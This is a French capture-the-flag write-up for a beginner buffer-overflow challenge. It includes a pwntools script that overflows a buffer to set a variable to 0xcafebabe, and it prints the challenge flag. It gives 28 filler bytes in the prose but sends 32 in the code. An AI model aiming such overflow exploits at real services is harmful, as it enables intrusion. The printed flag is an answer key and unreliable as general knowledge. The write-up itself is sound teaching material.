BOF 2

Catégorie: Pwn Difficulté: - Flag: CTFREI{c4f3b4b3_0v3rwr1t3}

Challenge

Description

Deuxième challenge de Buffer Overflow, analyse le script en C qui est donné et tente d'avoir le flag, cette fois-ci avec une petite différence, bon courage !

nc intro.ctfrei.fr 7002

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Comme dans , il va falloir remplir le buffer pour réécrire sur les variables suivantes. Sauf que là, nous devons écrire des valeurs précises. Il faut que check soit égal à 0xcafebabe (ou 3405691582 en base 10).

Nous devons donc envoyer ?? ?? ...28 octets ?? ?? BE BA FE CA 10 puisque la mémoire fonctionne en Little Endian, c'est-à-dire que les valeurs sont sauvegardées à l'envers (le 10 est le retour à la ligne à la fin de notre message).

En python ça donne :

from pwn import remote, context

context.log_level = 'error'
    
client = remote('intro.ctfrei.fr', 7002)
client.recv(2048)
fill_buffer = b'A' * 32
check = 0xcafebabe.to_bytes(4, 'little')
client.sendline(fill_buffer + check)
print(client.recv(2048).decode())
# Félicitations ! Voici le flag : CTFREI{c4f3b4b3_0v3rwr1t3}

PrécédentShop SuivantBOF win()

Dernière mise à jour il y a 7 mois

Cet article vous a-t-il été utile ?